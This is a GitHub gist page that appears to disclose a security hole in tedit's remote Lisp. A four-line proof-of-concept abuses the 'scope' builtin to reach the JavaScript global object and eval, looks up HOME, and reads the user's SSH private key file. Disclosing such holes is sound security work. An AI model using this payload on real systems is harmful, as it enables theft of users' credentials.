-
-
Save creationix/615a8afe09b97d221f09 to your computer and use it in GitHub Desktop.
Security hole in remote lisp for tedit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Abuse the scope builtin to get access to the JS global | |
(def global (scope.call null)) | |
; From that we can look up eval | |
(def eval global.eval) | |
; We can also look up environment variables | |
(def home global.process.env.HOME) | |
; And read the user's SSH key! | |
(readFile (+ home "/.ssh/id_rsa") "utf8") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Here is a longer example:
output